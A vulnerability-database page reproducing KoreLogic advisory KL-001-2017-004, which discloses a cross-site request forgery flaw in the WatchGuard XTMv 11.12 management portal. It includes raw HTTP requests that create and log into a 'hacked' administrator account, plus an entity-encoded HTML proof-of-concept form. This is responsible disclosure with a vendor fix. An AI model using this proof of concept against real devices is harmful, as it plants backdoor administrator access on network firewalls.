Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WatchGuard XTMv 11.12 Build 516911 Cross Site Request Forgery

🗓️ 12 Mar 2017 00:00:00Reported by Matthew BerginType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 58 Views

WatchGuard XTMv 11.12 Build 516911 Cross-Site Request Forgery vulnerability allows arbitrary administrator-level account creatio

Code
`KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery  
  
Title: WatchGuard XTMv User Management Cross-Site Request Forgery  
Advisory ID: KL-001-2017-004  
Publication Date: 2017.03.10  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: WatchGuard  
Affected Product: XTMv  
Affected Version: v11.12 Build 516911  
Platform: Embedded Linux  
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)  
Impact: Privileged Access  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
Lack of CSRF protection in the Add User functionality of the  
XTMv management portal can be leveraged to create arbitrary  
administrator-level accounts.  
  
3. Technical Description  
  
As observed below, no CSRF token is in use when adding a new  
user to the management portal.  
  
POST /put_data/ HTTP/1.1  
Host: 1.3.3.7:8080  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/json  
X-Requested-With: XMLHttpRequest  
Content-Length: 365  
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287  
DNT: 1  
Connection: close  
  
  
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device  
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}  
  
The HTTP response indicates that the changes were successful.  
  
HTTP/1.1 200 OK  
X-Frame-Options: SAMEORIGIN  
Content-Length: 68  
Expires: Sun, 28 Jan 2007 00:00:00 GMT  
Vary: Accept-Encoding  
Server: CherryPy/3.6.0  
Pragma: no-cache  
Cache-Control: no-cache, must-revalidate  
Date: Sat, 10 Dec 2016 18:08:22 GMT  
Content-Type: application/json  
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;  
Path=/; secure  
Connection: close  
  
{"status": true, "message": ["The changes were saved successfully"]}  
  
Now, the newly created backdoor account can be accessed.  
  
POST /agent/login HTTP/1.1  
Host: 1.3.3.7:8080  
Accept: application/xml, text/xml, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: text/xml  
X-Requested-With: XMLHttpRequest  
Content-Length: 414  
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53  
DNT: 1  
Connection: close  
  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>  
  
The response below shows the application issuing an authenticated  
session cookie.  
  
HTTP/1.1 200 OK  
X-Frame-Options: SAMEORIGIN  
Content-type: text/xml  
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly  
Connection: close  
Date: Sat, 10 Dec 2016 19:55:26 GMT  
Server: none  
Content-Length: 751  
  
<?xml version="1.0"?>  
<methodResponse>  
<params>  
<param>  
<value>  
<struct>  
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>  
<member><name>response</name><value></value></member>  
<member>  
<name>readwrite</name>  
<value><struct>  
<member><name>privilege</name><value>2</value></member>  
<member><name>peer_sid</name><value>0</value></member>  
<member><name>peer_name</name><value>error</value></member>  
<member><name>peer_ip</name><value>0.0.0.0</value></member>  
</struct></value>  
</member>  
</struct>  
</value>  
</param>  
</params>  
</methodResponse>  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has remediated this vulnerability in WatchGuard  
XTMv v11.12.1. Release notes and upgrade instructions are  
available at:  
  
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc. and Joshua Hardin.  
  
6. Disclosure Timeline  
  
2017.01.13 - KoreLogic sends vulnerability report and PoC to  
WatchGuard.  
2017.01.13 - WatchGuard acknowledges receipt of report.  
2017.01.23 - WatchGuard informs KoreLogic that the  
vulnerability will be addressed in the forthcoming  
v11.12.1 firmware, scheduled for general  
availability on or around 2017.02.21.  
2017.02.22 - WatchGuard releases v11.12.1.  
2017.03.10 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
<html>  
<body>  
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">  
<input type="hidden"  
name="&#x7b;&#x22;&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x22;&#x3a;&#x22;&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;&#x22;&#x2c;&#x22;&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;&#x22;&#x3a;&#x22;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x70;&#x61;&#x67;&#x65;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x2e;&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;&#x22;&#x2c;&#x22;&#x75;&#x73;&#x65;&#x72;&#x73;&#x22;&#x3a;&#x5b;&#x5d;&#x2c;&#x22;&#x61;&#x64;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;&#x22;&#x3a;&#x5b;&#x7b;&#x22;&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x22;&#x3a;&#x22;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;&#x22;&#x2c;&#x22;&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;&#x22;&#x3a;&#x22;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x76;&#x6f;&#x2e;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;&#x22;&#x2c;&#x22;&#x6e;&#x61;&#x6d;&#x65;&#x22;&#x3a;&#x22;&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;&#x22;&#x2c;&#x22;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x22;&#x3a;&#x22;&#x46;&#x69;&#x72;&#x65;&#x62;&#x6f;&#x78;&#x2d;&#x44;&#x42;&#x22;&#x2c;&#x22;&#x72;&#x6f;&#x6c;&#x65;&#x22;&#x3a;&#x22;&#x44;&#x65;&#x76;&#x69;&#x63;&#x65;&#x20;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x69;&#x73;&#x74;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x22;&#x2c;&#x22;&#x68;&#x61;&#x73;&#x68;&#x22;&#x3a;&#x22;&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;&#x22;&#x2c;&#x22;&#x65;&#x6e;&#x61;&#x62;&#x6c;&#x65;&#x64;&#x22;&#x3a;&#x31;&#x2c;&#x22;&#x72;&#x6f;&#x77;&#x69;&#x6e;&#x64;&#x65;&#x78;&#x22;&#x3a;&#x2d;&#x31;&#x7d;&#x5d;&#x2c;&#x22;&#x75;&#x70;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;&#x22;&#x3a;&#x5b;&#x5d;&#x2c;&#x22;&#x64;&#x65;&#x6c;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;&#x22;&#x3a;&#x5b;&#x5d;&#x7d;"  
value="" />  
<input type="submit" value="Trigger" />  
</form>  
</body>  
</html>  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Mar 2017 00:00Current
watchguard xtmvcross-site request forgeryarbitrary accounts
58